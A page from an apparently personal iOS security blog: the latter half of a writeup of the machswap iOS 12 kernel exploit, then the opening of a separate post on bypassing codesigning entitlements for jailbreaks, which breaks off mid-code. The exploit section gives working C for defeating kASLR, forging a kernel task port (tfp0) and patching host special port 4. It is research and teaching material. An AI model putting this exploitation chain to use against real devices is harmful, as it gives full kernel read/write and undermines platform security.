<p>The <code class="highlighter-rouge">slide_byte</code> spans values 0 through 255, however in the case of 0 a <code class="highlighter-rouge">base</code> of 0x21000000 is used, so in this case we can use the model that the <code class="highlighter-rouge">slide_byte</code> is actually values 1 through 256. This means that the lowest <code class="highlighter-rouge">base</code> is 0x01200000, and the highest is 0x21000000. Subtracting these we get the value 0x1fe00000, which is a whopping 530+mb of data! Taking this into account, it is clear that brute forcing by simply trying every possible address would more than likely hit unmapped memory.</p>
<p>However, there is a trick you can use to guarantee that you won’t hit unmapped memory. Take a look at this output from <code class="highlighter-rouge">jtool</code>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ jtool -l ~/Desktop/kernels/84-1211 | grep LC_SEGMENT_64
LC 00: LC_SEGMENT_64 Mem: 0xfffffff007004000-0xfffffff007078000 __TEXT
LC 01: LC_SEGMENT_64 Mem: 0xfffffff007078000-0xfffffff007098000 __DATA_CONST
LC 02: LC_SEGMENT_64 Mem: 0xfffffff007098000-0xfffffff0075c8000 __TEXT_EXEC
LC 03: LC_SEGMENT_64 Mem: 0xfffffff0075c8000-0xfffffff0075cc000 __LAST
LC 04: LC_SEGMENT_64 Mem: 0xfffffff0075cc000-0xfffffff0075d0000 __KLD
LC 05: LC_SEGMENT_64 Mem: 0xfffffff0075d0000-0xfffffff007678000 __DATA
LC 06: LC_SEGMENT_64 Mem: 0xfffffff007678000-0xfffffff007690000 __BOOTDATA
LC 07: LC_SEGMENT_64 Mem: 0xfffffff005ca4000-0xfffffff006138000 __PRELINK_TEXT
LC 08: LC_SEGMENT_64 Mem: 0xfffffff0077e8000-0xfffffff0079e0000 __PRELINK_INFO
[...]
</code></pre></div></div>
<p>Up until the beginning of PRELINK_TEXT, all regions (including __TEXT) are mapped completely continuously (right as one segment ends, another one starts) at the base of the kernel virtual address space (VAS). Therefore, if we are able to find a pointer into __TEXT (ie, the address of a function), we can then derive the base of the kernel via brute force as we are guaranteed not to hit any unmapped memory! The only question is, how do we get such a pointer?</p>
<p>In C++, every object contains something called a vtable. The vtable is an array of “virtual” methods (methods which the object implements). The vtable is located at offset 0x0 within the object, and is simply a list of function pointers. If we can find a C++ object (and therefore its vtable), we can get our function pointer, and derive the kernel slide.</p>
<p>Since we have a read primitive set up, and an attacker-controlled port, we can traverse kernel memory to find such a C++ object.</p>
<p>One example is the IOSurfaceUserClient object, which we created earlier when we set up our heap spray. We can register the port we opened to the client via the <code class="highlighter-rouge">mach_ports_register</code> API, which sets a pointer to the port to a field within our <code class="highlighter-rouge">task</code> struct: <code class="highlighter-rouge">itk_registered</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kern_return_t
mach_ports_register(
task_t task,
mach_port_array_t memory,
mach_msg_type_number_t portsCnt)
{
[...]
for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
ipc_port_t old;
old = task->itk_registered[i];
task->itk_registered[i] = ports[i];
ports[i] = old;
}
[...]
return KERN_SUCCESS;
}
</code></pre></div></div>
<p>So from our task struct, we can read the <code class="highlighter-rouge">itk_registered</code> offset to find the IOSurface ipc_port, then to the <code class="highlighter-rouge">ip_kobject</code> field to find the C++ object itself, then dereference at offset 0x0 to find the vtable, and then dereference any of the vtable methods to find our <code class="highlighter-rouge">__TEXT</code> pointer. However, we first need to find our task struct. For this, we can look at <code class="highlighter-rouge">itk_space</code>. This is an address space which holds mach port rights owned by a task, mapping the <code class="highlighter-rouge">uint32_t</code> port handles to kernel-side <code class="highlighter-rouge">ipc_port_t</code>’s. If we can find a message sent to a port owned by our process, we can find the <code class="highlighter-rouge">itk_space</code> pointer and therefore traverse kernel memory to find the address of a port we allocate within our task, and from there our own task struct (<code class="highlighter-rouge">ipc_space->is_task</code>).</p>
<p>Luckily, our fakeport is owned by our process, we have a userland handle on it of which we can send a message to, and we can then read the <code class="highlighter-rouge">ip_messages</code> struct within our fakeport to find the kernel representation of the Mach message which was sent. This is similar to a technique which I have used in the past in order to get a buffer of data into kernelspace, except this time it is used for ports instead of data.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static kern_return_t send_port(mach_port_t rcv, mach_port_t myP)
{
typedef struct {
mach_msg_header_t Head;
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t task_port;
} Request;
[...]
InP->msgh_body.msgh_descriptor_count = 1;
InP->task_port.name = myP;
InP->task_port.disposition = MACH_MSG_TYPE_COPY_SEND;
InP->task_port.type = MACH_MSG_PORT_DESCRIPTOR;
err = mach_msg(&InP->Head, MACH_SEND_MSG | MACH_SEND_TIMEOUT, InP->Head.msgh_size, 0, 0, 5, 0);
[...]
}
</code></pre></div></div>
<p>Here we set up a message containing a mach port descriptor, and put our port handle into the OOL (out of line) port descriptor. We then call <code class="highlighter-rouge">send_port</code> using our fakeport as the <code class="highlighter-rouge">rcv</code> argument, and a newly allocated port with both receive and send rights as our <code class="highlighter-rouge">myP</code> argument.</p>
<p>Once the Mach message has been sent, it will be present within <code class="highlighter-rouge">fakeport->ip_messages.port.messages</code>. We can then traverse from this message to find the pointer to our task as so:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ret = send_port(the_one, gangport);
uint64_t ikmq_base = fakeport->ip_messages.port.messages;
uint64_t ikm_header = 0x0;
rk64(ikmq_base + 0x18, ikm_header); /* ipc_kmsg->ikm_header */
uint64_t port_addr = 0x0;
rk64(ikm_header + 0x24, port_addr); /* 0x24 is mach_msg_header_t + body + offset of our port into mach_port_descriptor_t */
uint64_t itk_space = 0x0;
rk64(port_addr + offsetof(kport_t, ip_receiver), itk_space);
uint64_t ourtask = 0x0;
rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */
</code></pre></div></div>
<p>Since we now have a pointer to our task struct, we can now use the <code class="highlighter-rouge">mach_ports_register</code> trick to register the IOSurface UserClient, and perform a few more reads to find the vtable entry:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ret = mach_ports_register(mach_task_self(), &client, 1);
uint64_t iosruc_port = 0x0;
rk64(ourtask + offsets->struct_offsets.task_itk_registered, iosruc_port);
uint64_t iosruc_addr = 0x0;
rk64(iosruc_port + offsetof(kport_t, ip_kobject), iosruc_addr);
uint64_t iosruc_vtab = 0x0;
rk64(iosruc_addr + 0x0, iosruc_vtab);
uint64_t get_trap_for_index_addr = 0x0;
rk64(iosruc_vtab + (offsets->iosurface.get_external_trap_for_index * 0x8), get_trap_for_index_addr);
</code></pre></div></div>
<p><code class="highlighter-rouge">get_trap_for_index_addr</code> is the address of the <code class="highlighter-rouge">IOSurfaceRootUserClient::getExternalTrapForIndex</code> function, which resides in kernel’s <code class="highlighter-rouge">__TEXT</code> region. We can then walk backwards until we reach the magic value at the kernel header (<code class="highlighter-rouge">MH_MAGIC_64</code>).</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define KERNEL_HEADER_OFFSET 0x4000
#define KERNEL_SLIDE_STEP 0x100000
uint64_t kernel_base = (get_trap_for_index_addr & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;
do
{
uint32_t kbase_value = 0x0;
rk32(kernel_base, kbase_value);
if (kbase_value == MH_MAGIC_64)
{
LOG("found kernel_base: 0x%llx", kernel_base);
break;
}
kernel_base -= KERNEL_SLIDE_STEP;
} while (true);
uint64_t kslide = kernel_base - offsets->constant.kernel_image_base;
</code></pre></div></div>
<p>As we have deduced the kslide value, kASLR has now been defeated, and we continue with our exploitation by building the final primitive: the fake kernel task port. This task port will allow full read and write access to the kernel’s VM map, allowing arbitrary modification of kernel data.</p>
<h3 id="0x08-building-a-fake-kernel-task-port">0x08 Building a Fake Kernel Task Port</h3>
<p>A kernel task port is simply a ipc_port struct of type <code class="highlighter-rouge">IKOT_TASK</code>, with a representation of the kernel’s task_t struct attached. However, when using the task port in the Mach API, many of the fields aren’t checked or accessed at any point. This means we don’t need to use the original ipc_port or task_t structs. We can simply forge arbitrary ones containing the minimum of data filled out in order for the Mach API to recognise it as a valid port. Luckily, there are only two things we need to find. The first is the kernel’s <code class="highlighter-rouge">vm_map_t</code>, which is a struct that holds data about the kernel’s virtual address space.</p>
<p>The kernel implements a nice feature which allows you to easily loop through <code class="highlighter-rouge">proc_t</code> structs (and hence their corresponding <code class="highlighter-rouge">task_t</code> counterparts) to find target processes, via a linked list (<code class="highlighter-rouge">p_list</code>) at the start of the <code class="highlighter-rouge">proc_t</code> struct. This includes the kernel’s proc and task structs (<code class="highlighter-rouge">kernel_task</code> actually runs as a “normal” process on your system, with the PID 0 – you can see it in Activity Monitor on macOS).</p>
<p>We already have the address of our own <code class="highlighter-rouge">task_t</code> from when we needed to find our IOSurfaceRootUserClient port earlier. So we can dereference the <code class="highlighter-rouge">bsd_info</code> pointer to get the corresponding <code class="highlighter-rouge">proc_t</code> struct, and then loop backward through the list until we reach the first entry, <code class="highlighter-rouge">kernel_task</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct proc {
LIST_ENTRY(proc) p_list; /* List of all processes. */
void * task; /* corresponding task (static)*/
struct proc * p_pptr; /* Pointer to parent process.(LL) */
[...]
</code></pre></div></div>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> uint64_t kernproc = ourproc;
while (kernproc != 0x0)
{
uint32_t found_pid = 0x0;
rk32(kernproc + offsets->struct_offsets.proc_pid, found_pid);
if (found_pid == 0)
{
break;
}
/*
kernproc will always be at the start of the linked list,
so we loop backwards in order to find it
*/
rk64(kernproc + 0x0, kernproc);
}
</code></pre></div></div>
<p>From there we can read <code class="highlighter-rouge">proc_t->task</code> to get to the kernel’s <code class="highlighter-rouge">task_t</code> struct, which contains a field which is a pointer to the kernel’s <code class="highlighter-rouge">vm_map_t</code>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct task {
/* Synchronization/destruction information */
decl_lck_mtx_data(,lock) /* Task's lock */
_Atomic uint32_t ref_count; /* Number of references to me */
boolean_t active; /* Task has not been terminated */
boolean_t halting; /* Task is being halted */
/* Virtual timers */
uint32_t vtimers;
/* Miscellaneous */
vm_map_t map; /* Address space description */
queue_chain_t tasks; /* global list of tasks */
[...]
</code></pre></div></div>
<p>To build our fake task struct, we can simply use some hardcoded data, and drop in our kernel <code class="highlighter-rouge">vm_map</code> pointer:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> fake_task->lock.data = 0x0;
fake_task->lock.type = 0x22;
fake_task->ref_count = 100;
fake_task->active = 1;
fake_task->map = kernel_vm_map;
*(uint32_t *)((uint64_t)fake_task + offsets->struct_offsets.task_itk_self) = 1;
</code></pre></div></div>
<p>We also need to find the kernel’s <code class="highlighter-rouge">ip_receiver</code>, which is a struct where Mach messages that have not yet been received (ie. are in transit) are stored. This is easy to find however, as the receiver of our IOSurfaceUserClient is the kernel (as this is where messages are sent to on that port).</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /*
since our IOSurfaceRoot userclient is owned by kernel, the
ip_receiver field will point to kernel's ipc space
*/
uint64_t ipc_space_kernel = 0x0;
rk64(iosruc_port + offsetof(kport_t, ip_receiver), ipc_space_kernel);
LOG("ipc_space_kernel: 0x%llx", ipc_space_kernel);
</code></pre></div></div>
<p>We then temporarily turn our fakeport (<code class="highlighter-rouge">the_one</code>) into a kernel task port by updating it’s <code class="highlighter-rouge">ip_receiver</code>, which we can then use as an early tfp0 primitive in order to allocate and write some memory, for our kernel task and kernel port structs (error checking omitted):</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /* the_one should now have access to kernel mem */
uint64_t kbase_data = kread64(the_one, kernel_base);
LOG("got kernel base: %llx", kbase_data);
/* allocate kernel task */
uint64_t kernel_task_buf = kalloc(the_one, 0x600);
LOG("kernel_task_buf: 0x%llx", kernel_task_buf);
kwrite(the_one, kernel_task_buf, (void *)fake_task, 0x600);
/* allocate kernel port */
uint64_t kernel_port_buf = kalloc(the_one, 0x3
LOG("kernel_port_buf: 0x%llx", kernel_port_buf);
fakeport->ip_kobject = kernel_task_buf;
kwrite(the_one, kernel_port_buf, (void *)fakeport, 0x300);
</code></pre></div></div>
<p>Our fakeport <code class="highlighter-rouge">the_one</code> is now a “full” (but forged) kernel task port (tfp0) which can be used to read, write, and allocate kernel memory, and is backed completely by kernel buffers – no userland allocations are used after this point.</p>
<h3 id="0x09-buttoning-up-hsp4-task_dyld_info-patch">0x09 Buttoning Up: HSP4, TASK_DYLD_INFO patch</h3>
<p>There are a couple more finishing touches we need to do before we can exit our exploit. The first is setting up the hsp4 (<code class="highlighter-rouge">host_get_special_port(..., 4, ...)</code>) patch, which allows processes running as root to get a send right to the kernel task port (tfp0).</p>
<p>This is fairly easy to set up, we simply need to perform a write to the <code class="highlighter-rouge">realhost</code> struct, into the <code class="highlighter-rouge">ipc_port_t special</code> array.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct host {
decl_lck_mtx_data(,lock) /* lock to protect exceptions */
ipc_port_t special[HOST_MAX_SPECIAL_PORT + 1];
struct exception_action exc_actions[EXC_TYPES_COUNT];
};
</code></pre></div></div>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /*
host_get_special_port(4) patch
allows the kernel task port to be accessed by any root process
*/
kwrite64(the_one, realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
</code></pre></div></div>
<p>We can then quickly elevate our UID to 0 (root) in order to check the patch worked, as the <code class="highlighter-rouge">host_special</code> API requires root access.</p>
<p><em>Note: we also de-elevate back to the mobile user before exiting the exploit as leaving ourselves as root can cause instability in the system upon exiting the app. Jailbreaks can quickly and easily re-elevate to root if and when required.</em></p>
<p>Another (new) patch is the <code class="highlighter-rouge">TASK_DYLD_INFO</code> patch, suggested by @Siguza <a href="https://twitter.com/s1guza/status/1057072987814445056">here</a>. The <code class="highlighter-rouge">task_info</code> API allows an application to retrieve information about a specific process, including info about the dynamic linker. As we can see in the following snippet, the kernel will return three fields of data stored in the <code class="highlighter-rouge">task</code> back to userland.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case TASK_DYLD_INFO:
{
task_dyld_info_t info;
[...]
info = (task_dyld_info_t)task_info_out;
info->all_image_info_addr = task->all_image_info_addr;
info->all_image_info_size = task->all_image_info_size;
/* only set format on output for those expecting it */
if (*task_info_count >= TASK_DYLD_INFO_COUNT) {
info->all_image_info_format = task_has_64Bit_addr(task) ?
TASK_DYLD_ALL_IMAGE_INFO_64 :
TASK_DYLD_ALL_IMAGE_INFO_32 ;
*task_info_count = TASK_DYLD_INFO_COUNT;
} else {
*task_info_count = TASK_LEGACY_DYLD_INFO_COUNT;
}
break;
}
</code></pre></div></div>
<p>Since the kernel doesn’t use DYLD, nor will our fake task port ever be used by the kernel itself, we can use these fields to store data about the kernel. In this case, we can use the <code class="highlighter-rouge">all_image_info_addr</code> field to store the slid base address of the kernel, and the <code class="highlighter-rouge">all_image_info_size</code> field to store the kernel slide. This helps alleviate the use of offset-storing files and provides a clean method to find the (previously somewhat tricky to deduce) kernel slide.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /*
task_info TASK_DYLD_INFO patch
this patch (credit @Siguza) allows you to provide tfp0 to the task_info
API, and retreive some data from the kernel's task struct
we use it for storing the kernel base and kernel slide values
*/
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_addr) = kernel_base;
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_size) = kslide;
</code></pre></div></div>
<p>You can then call <code class="highlighter-rouge">task_info</code>, providing tfp0 as your port and supplying the <code class="highlighter-rouge">TASK_DYLD_INFO</code> flag.</p>
<h3 id="0x0a-closing-words">0x0A: Closing Words</h3>
<p>For a long time I was completely daunted by the idea of exploiting something as complex as the iOS kernel. However, once I dived in and gave it a go it quickly started to make more and more sense. There is a lot of great reading material online to refer to, including writeups and other open-source exploits. I’m now a big fan of MIG reference counting bugs due to their exploitational simplicity and consistency, and would love to find one as a 0day one day. ;)</p>
<p>Of course thanks to @s1guza, @littlelailo, and @stek29 for development help, and @s0rrymybad for the intial bug details and PoC code. You can find their Twitter handles below.</p>
<p>If you have any questions feel free to @ me and/or follow me on Twitter, and take a look through my GitHub if you’re interested in other open-source iOS projects. Thanks!</p>
<p><strong>Twitter:</strong> <a href="https://twitter.com/iBSparkes">https://twitter.com/iBSparkes</a></p>
<p><strong>GitHub:</strong> <a href="https://github.com/PsychoTea">https://github.com/PsychoTea</a></p>
<p><strong>machswap Source Code:</strong> <a href="https://github.com/PsychoTea/machswap">https://github.com/PsychoTea/machswap</a></p>
<p><strong>machswap2 (SMAP Version):</strong> <a href="https://github.com/PsychoTea/machswap2">https://github.com/PsychoTea/machswap2</a></p>
<p><strong>@s1guza:</strong> <a href="https://twitter.com/s1guza">https://twitter.com/s1guza</a></p>
<p><strong>@littlelailo:</strong> <a href="https://twitter.com/littlelailo">https://twitter.com/littlelailo</a></p>
<p><strong>@stek29:</strong> <a href="https://twitter.com/stek29">https://twitter.com/stek29</a></p>
<p><strong>@s0rrymybad:</strong> <a href="https://twitter.com/s0rrymybad">https://twitter.com/s0rrymybad</a></p>Back at the end of January I demo’d an early iOS 12 prototype jailbreak, which included a homebrewed kernel exploit, root FS remount, and nonce setter. I achieved this in a little under two days with help from my good friends @S1guza, @littlelailo, and @stek29, making it one of the first iOS 12 prototype jailbreaks, before any public kernel exploits were released (subtle flex). About a month later I tidied up the source code and released the inital non-SMAP exploit under the name machswap (I later released an SMAP-compatible version, machswap2, which can also be found on my GitHub). I wanted to create a writeup detailing the bug and how the exploit works, in order to inspire and help others which are interested in iOS security research.Diving into the iOS Kernel: Breaking Entitlements2018-04-06T02:27:44+01:002018-04-06T02:27:44+01:00https://sparkes.zone/blog/ios/2018/04/06/diving-into-the-kernel-entitlements<p>Under the hood of the iOS kernel, under AMFI and the Sandbox, lies codesigning. Codesigning validates whether code is allowed to run on an iOS device. If it isn’t signed by Apple - no worky. But if you have a jailbroken device, this restriction is removed - it’s one of the reasons we jailbreak. If you’ve ever used a jailbroken device, you would’ve experienced this without even realising it: you think Apple signed Cydia for us? (Hint: no).</p>
<p>These checks are mandated by the kernel and various extensions (read: AppleMobileFileIntegrity.kext, Sandbox.kext), and under a typical kppbypass jailbreak they’re fairly trivial to patch. Some patching of the kernel’s functions and boom - restrictions removed. But under kppless we don’t withhold the same liberty. With the advent of a hardware protection mechanism, AMCC, to new iDevices, the development community has drifted to a more favourable approach to jailbreaking: why bypass these strong mechanims, when we can simply work within their bounds? Enter kppless.</p>
<p>I won’t go into detail on how codesigning works on a low level here, perhaps I will leave that to a different post. Instead, I want to talk about <strong>entitlements</strong>, and why they’re something worth worrying about on a kppless jailbreak.</p>
<p>Entitlements dictate some of the ‘rules’ a binary is allowed to break on an iOS device, and also modifies a binaries behaviour under the context of the kernel and inter-process communication. For example, the <code class="highlighter-rouge">com.apple.private.skip-library-validation</code> entitlement means that when a library is loaded into a process, if the process has this entitlement, the library is able to skip the Team ID and platform binary checks usually performed by the kernel. This is what allows us to load tweaks and other unauthorized libraries into processes on the system.</p>
<p>One of the rather irritating security mechanisms implemented as part of the Sandbox and codesigning is called containerizing. Containerizing basically means placing 3rd-party software (eg, App Store apps) into a specific, separated container (it also applies to removable Apple apps but isn’t relevant here). It’s effectively damage control: put all the scary stuff into separate little tubs, and seal it off from the rest of the system.</p>
<p>Linking back to what I touched on earlier, under kppless we don’t have the same access to patch these checks. So running binaries outside of a container wouldn’t work - and that’s a big deal. Every single binary used on a jailbroken system is outside of a container. For example, utilities such as the <code class="highlighter-rouge">bash</code> shell, <code class="highlighter-rouge">dpkg</code>, <code class="highlighter-rouge">apt</code>, and <code class="highlighter-rouge">Cydia</code> all live in various folders in the root filesystem; <code class="highlighter-rouge">/bin</code>, <code class="highlighter-rouge">/usr/bin</code>, <code class="highlighter-rouge">/Applications</code>.
When you try to run such a binary, you would see a <code class="highlighter-rouge">Killed: 9</code> error in shell, and recieve a message such as this in syslog:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Sandbox: hook..execve() killing {name} pid {pid}[UID: {uid}]: outside of container && !i_can_has_debugger
</code></pre></div></div>
<p>So what can we do under kppless to bypass this check? Enter: the <code class="highlighter-rouge">platform-application</code> entitlement.</p>
<p><code class="highlighter-rouge">platform-application</code> effectively allows a binary to run outside of a container. This means that <code class="highlighter-rouge">bash</code>, <code class="highlighter-rouge">dpkg</code>, etc, will be allowed to run from other areas of the filesystem. You can add entitlements such as <code class="highlighter-rouge">platform-application</code> to a binary with a simple xml or plist file and a tool such as <code class="highlighter-rouge">ldid</code>, or Jonathan Levin’s <code class="highlighter-rouge">jtool</code>. However, this is performed on disk, which poses a slight problem in this context. It would be pretty unfeasible to go and resign every binary used on a jailbroken system, and also update the thousands of GUI apps and shell tools on Cydia. Not to mention, there’s no way we can do this at runtime. If the binary was modified, the CDHash would be invalidated and that binary would fail basic codesigning checks. So what can we do about it?</p>
<p>Well, entitlements might be stored on the disk <em>to start with</em>, but they have to be loaded into kernel memory at <em>some point</em>. Let’s think about how codesigning works on a kernel level.
First a mach-O is read, parsed, the required slice is located, and then the load commands are parsed (<a href="http://xr.anadoxin.org/source/xref/macos-10.12.6-sierra/xnu-3789.70.16/bsd/kern/mach_loader.c#496">parse_machfile</a>). One of those load commands is <code class="highlighter-rouge">LC_CODE_SIGNATURE</code>, which is a segment that contains information about the codesignature of a binary. The <a href="http://xr.anadoxin.org/source/xref/macos-10.12.6-sierra/xnu-3789.70.16/bsd/kern/mach_loader.c#load_code_signature">load_code_signature</a> function is then called on the binary, which checks to see if a code signature has been previously parsed and stored (<a href="http://xr.anadoxin.org/source/xref/macos-10.12.6-sierra/xnu-3789.70.16/bsd/kern/ubc_subr.c#3462">ubc_cs_blob_get</a>), and if not, loads it from a file, via <a href="http://xr.anadoxin.org/source/xref/macos-10.12.6-sierra/xnu-3789.70.16/bsd/kern/ubc_subr.c#3046">ubc_cs_blob_add</a>. Let’s take a further look at how that works.</p>
<h3 id="jumping-into-ubc_cs_blob_add">Jumping into ubc_cs_blob_add</h3>
<p>One of the first things that is done is a new <code class="highlighter-rouge">cs_blob</code> structure is allocated and partially filled. This structure contains all the codesigning information; the cpu type, offset of code directory within the binary, the CDHash and CDHash type, whether the binary is marked as a platform binary, and lastly, <em>the entitlements</em>.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="mi">099</span> <span class="k">struct</span> <span class="n">cs_blob</span> <span class="p">{</span>
<span class="mi">100</span> <span class="k">struct</span> <span class="n">cs_blob</span> <span class="o">*</span><span class="n">csb_next</span><span class="p">;</span> <span class="cm">/* The next csblob in the chain */</span>
<span class="mi">101</span> <span class="n">cpu_type_t</span> <span class="n">csb_cpu_type</span><span class="p">;</span> <span class="cm">/* The cpu type */</span>
<span class="mi">102</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">csb_flags</span><span class="p">;</span> <span class="cm">/* Flags such as CS_VALID, CS_KILL, CS_GET_TASK_ALLOW */</span>
<span class="mi">103</span> <span class="kt">off_t</span> <span class="n">csb_base_offset</span><span class="p">;</span> <span class="cm">/* Offset of Mach-O binary in fat binary */</span>
<span class="mi">104</span> <span class="kt">off_t</span> <span class="n">csb_start_offset</span><span class="p">;</span> <span class="cm">/* Blob coverage area start, from csb_base_offset */</span>
<span class="mi">105</span> <span class="kt">off_t</span> <span class="n">csb_end_offset</span><span class="p">;</span> <span class="cm">/* Blob coverage area end, from csb_base_offset */</span>
<span class="mi">106</span> <span class="n">vm_size_t</span> <span class="n">csb_mem_size</span><span class="p">;</span>
<span class="mi">107</span> <span class="n">vm_offset_t</span> <span class="n">csb_mem_offset</span><span class="p">;</span>
<span class="mi">108</span> <span class="n">vm_address_t</span> <span class="n">csb_mem_kaddr</span><span class="p">;</span>
<span class="mi">109</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">csb_cdhash</span><span class="p">[</span><span class="n">CS_CDHASH_LEN</span><span class="p">];</span> <span class="cm">/* The raw CDHash as an array */</span>
<span class="mi">110</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">cs_hash</span> <span class="o">*</span><span class="n">csb_hashtype</span><span class="p">;</span> <span class="cm">/* The type of CDHash and the functions for interpreting it */</span>
<span class="mi">111</span> <span class="n">vm_size_t</span> <span class="n">csb_hash_pagesize</span><span class="p">;</span> <span class="cm">/* each hash entry represent this many bytes in the file */</span>
<span class="mi">112</span> <span class="n">vm_size_t</span> <span class="n">csb_hash_pagemask</span><span class="p">;</span>
<span class="mi">113</span> <span class="n">vm_size_t</span> <span class="n">csb_hash_pageshift</span><span class="p">;</span>
<span class="mi">114</span> <span class="n">vm_size_t</span> <span class="n">csb_hash_firstlevel_pagesize</span><span class="p">;</span> <span class="cm">/* First hash this many bytes, then hash the hashes together */</span>
<span class="mi">115</span> <span class="k">const</span> <span class="n">CS_CodeDirectory</span> <span class="o">*</span><span class="n">csb_cd</span><span class="p">;</span>
<span class="mi">116</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">csb_teamid</span><span class="p">;</span>
<span class="mi">117</span> <span class="k">const</span> <span class="n">CS_GenericBlob</span> <span class="o">*</span><span class="n">csb_entitlements_blob</span><span class="p">;</span> <span class="cm">/* Magic, length, then the raw cstring entitlements */</span>
<span class="mi">118</span> <span class="kt">void</span> <span class="o">*</span> <span class="n">csb_entitlements</span><span class="p">;</span> <span class="cm">/* The entitlements as an OSDictionary */</span>
<span class="mi">119</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">csb_platform_binary</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>
<span class="mi">120</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">csb_platform_path</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>
<span class="mi">121</span> <span class="p">};</span></code></pre></figure>
<p>Then the CodeDirectory is parsed by <code class="highlighter-rouge">cs_validate_csblob</code>, choosing the correct subdirectory to use, and finding the entitlements. The code then checks to see if the blob size is less than what was provided by <code class="highlighter-rouge">load_code_signature</code>, and if
so, re-allocates it into a better fitting memory allocation.</p>
<p>The rest of the <code class="highlighter-rouge">cs_blob</code> structure is then filled out, mapping in the code directory, entitlements, flags, the hashtype, etc.
Once finished, <code class="highlighter-rouge">mac_vnode_check_signature</code> is then called. This finds the MACF policy which is responsible for validating codesignatures (hey AMFI!), and calls to that to make sure everything is in order. AMFI actually calls to amfid here, which is where our userland patch resides. Here the CDHash is loaded into a dictionary passed by AMFI, which validates the CDHash is corect and allows code execution to continue. The placement of this call to AMFI is <strong>extremely important</strong>, and is part of the reason why this patch became so intricate to implement. The <code class="highlighter-rouge">cs_blob</code> the kernel is current halfway through generating and <strong>hasn’t yet been assigned anywhere</strong>. This new blob is currently floating somewhere around the kernel’s address space, and would be extremely inefficient to locate. <strong>This is a problem</strong>. When we grab the binary’s vnode from within amfid, and look at <code class="highlighter-rouge">vnode->ubc_info->cs_blob</code> (where the cs_blob struct is eventually stored), it’s <strong>zero</strong>. This threw me at first, until I read through this code and figured out how the binary is actually processed - then it suddenly clicked why this was occuring.</p>
<p>The first idea that comes to mind here is simply to generate our own csblob, and place it into <code class="highlighter-rouge">vnode->ubc_info->cs_blob</code> before the kernel does. But that doesn’t work - either the csblob is simply overwritten by the <code class="highlighter-rouge">ubc_cs_blob_add</code> function, or it would flag up errors within the kernel and wouldn’t pass validation checks. Hmm. What would be perfect here is if there was some way to write our own <code class="highlighter-rouge">cs_blob</code>, and then <em>not</em> have the kernel overwrite it. That way we could add our entitlements into <code class="highlighter-rouge">csb_entitlements</code> and/or <code class="highlighter-rouge">csb_entitlements_blob</code> without having them messed with afterwards.</p>
<p>Let’s continute reading the code and see if we can find anything which would fit that precondition.</p>
<p>The kernel then checks for the <code class="highlighter-rouge">CS_PLATFORM_BINARY</code> flag, setting <code class="highlighter-rouge">csb_platform_binary</code> and/or <code class="highlighter-rouge">csb_platform_path</code> if necessary, and parsing the teamid via <code class="highlighter-rouge">csblob_parse_teamid</code>.</p>
<p>Then, the kernel loops through all of the <code class="highlighter-rouge">cs_blob</code> structs currently present, checking for an overlap. As mentioned in the struct above, the first member of the <code class="highlighter-rouge">cs_blob</code> struct is a pointer to another <code class="highlighter-rouge">cs_blob</code> struct. This functions as a kind of list or chain, with each <code class="highlighter-rouge">cs_blob</code> linking to its predecessor, in the case one is ever replaced.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="mi">3249</span> <span class="cm">/* check if this new blob overlaps with an existing blob */</span>
<span class="mi">3250</span> <span class="k">for</span> <span class="p">(</span><span class="n">oblob</span> <span class="o">=</span> <span class="n">uip</span><span class="o">-></span><span class="n">cs_blobs</span><span class="p">;</span>
<span class="mi">3251</span> <span class="n">oblob</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="mi">3252</span> <span class="n">oblob</span> <span class="o">=</span> <span class="n">oblob</span><span class="o">-></span><span class="n">csb_next</span><span class="p">)</span> <span class="p">{</span></code></pre></figure>
<p>The first set of checks are some simple comparisons between the blobs, the idea here being to check for similarity between the blobs, indicating a conflict. Notice how if <code class="highlighter-rouge">blob->csb_platform_binary</code> and/or <code class="highlighter-rouge">blob->csb_teamid</code> isn’t set, or if the inner <code class="highlighter-rouge">if</code> conditions fail, the rest of the checks are simply skipped over.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cm">/* check for conflicting teamid */</span>
